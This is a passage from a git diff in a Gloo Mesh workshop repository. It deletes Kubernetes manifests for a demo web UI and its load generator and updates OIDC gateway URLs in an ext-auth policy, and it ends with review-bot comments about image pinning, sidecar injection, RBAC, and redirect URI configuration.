value: "shipping.backend-apis-team.solo-io.mesh:80" - - name: CHECKOUT_SERVICE_ADDR - value: "checkout.backend-apis-team.solo-io.mesh:80" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "productcatalogservice.backend-apis.svc.cluster.local:3550" - - name: CURRENCY_SERVICE_ADDR - value: "currencyservice.backend-apis.svc.cluster.local:7000" - # # ENV_PLATFORM: One of: local, gcp, aws, azure, onprem - # # When not set, defaults to "local" unless running in GKE, otherwies auto-sets to gcp - - name: ENV_PLATFORM - value: "onprem" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: KUBERNETES_NODE_NAME - valueFrom: - fieldRef: - fieldPath: spec.nodeName - - name: KUBERNETES_POD_NAME - valueFrom: - fieldRef: - fieldPath: metadata.name - - name: KUBERNETES_NAMESPACE - valueFrom: - fieldRef: - fieldPath: metadata.namespace - - name: KUBERNETES_CLUSTER_NAME - value: cluster1 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: loadgenerator - namespace: web-ui ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: loadgenerator - namespace: web-ui -spec: - selector: - matchLabels: - app: loadgenerator - replicas: 1 - template: - metadata: - labels: - app: loadgenerator - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: "true" - spec: - serviceAccountName: loadgenerator - terminationGracePeriodSeconds: 5 - restartPolicy: Always - containers: - - name: main - image: gcr.io/google-samples/microservices-demo/loadgenerator:v0.3.5 - env: - - name: FRONTEND_ADDR - value: "frontend.web-ui.svc.cluster.local:80" - - name: USERS - value: "2" - resources: - requests: - cpu: 300m - memory: 256Mi ---- - -apiVersion: v1 -kind: Service -metadata: - name: loadgenerator - namespace: web-ui - labels: - app: loadgenerator -spec: - type: ClusterIP - selector: - app: loadgenerator - ports: - - name: http - port: 80 - targetPort: 8080 \ No newline at end of file 
diff --git a/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml b/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml index d7b8616..69377f1 100644 --- a/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml +++ b/workshops/gloo-mesh-demo/tracks/06-api-gateway/ext-auth-policy.yaml @@ -17,7 +17,7 @@ spec: configs: - oauth2: oidcAuthorizationCode: - appUrl: https://${GLOO_GATEWAY} + appUrl: https://${GLOO_GATEWAY_HTTPS} callbackPath: /callback clientId: ${KEYCLOAK_CLIENTID} clientSecretRef: @@ -25,7 +25,7 @@ spec: namespace: gloo-mesh issuerUrl: "${KEYCLOAK_URL}/realms/master/" logoutPath: /logout - afterLogoutUrl: "${KEYCLOAK_URL}/realms/master/protocol/openid-connect/logout?redirect_uri=https://${GLOO_GATEWAY}" + afterLogoutUrl: "${KEYCLOAK_URL}/realms/master/protocol/openid-connect/logout?redirect_uri=https://${GLOO_GATEWAY_HTTPS}" scopes: - email headers:
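Review bot: in the new web-ui-values.yaml (`@@ -0,0 +1,56 @@`), `images.repository: gcr.io/solo-test-236622` with `tag: "1.3"` applies one registry and one mutable tag to every component the chart creates, while the manifest it replaces pulled the frontend as `frontend:solo-build` from that registry and the load generator from `gcr.io/google-samples/microservices-demo/loadgenerator:v0.3.5`. Please confirm that both the frontend and the load generator images are published under that repository at tag 1.3, and consider pinning by digest if the chart has a field for it, so a re-pushed tag cannot change what workshop clusters run. The file also ends without a trailing newline.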
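Review bot: the deletion of web-ui.yaml (`@@ -1,186 +0,0 @@`) also removes the `web-ui` Namespace carrying `istio-injection: enabled`, and nothing in the replacement values file sets a namespace or an injection label. If the install step does not create and label the namespace before the chart is installed, the frontend starts without a sidecar and mesh policy will not apply to it. The same deletion drops the `view-nodes` ClusterRole and the `read-nodes` ClusterRoleBinding for the frontend service account; with `serviceAccounts.create: true` in the new values, please note in the README whether the chart still grants cluster-wide read access to nodes or whether that access is no longer needed.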
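Review bot: in the `@@ -17,7 +17,7 @@` hunk of ext-auth-policy.yaml, `appUrl` now depends on `${GLOO_GATEWAY_HTTPS}`, and this part of the patch does not show where that variable is exported. If it is empty when the placeholders are substituted, the policy is applied with `appUrl: https://` and the OIDC callback at `/callback` cannot match. Please make sure the lab step that applies this file exports the variable first, and that the resulting URL, including any port, equals a redirect URI registered for `${KEYCLOAK_CLIENTID}` in Keycloak.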
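Review bot: in the `@@ -25,7 +25,7 @@` hunk, `afterLogoutUrl` repeats the `https://${GLOO_GATEWAY_HTTPS}` expression from `appUrl` and places it unencoded in the `redirect_uri` query parameter. The two values have to stay identical, and the logout target has to be accepted by the Keycloak client, so a short comment next to `afterLogoutUrl` saying so would help the next person who changes one of them. If `GLOO_GATEWAY_HTTPS` can ever contain `?`, `&` or `#`, the value also needs percent-encoding before it is substituted here.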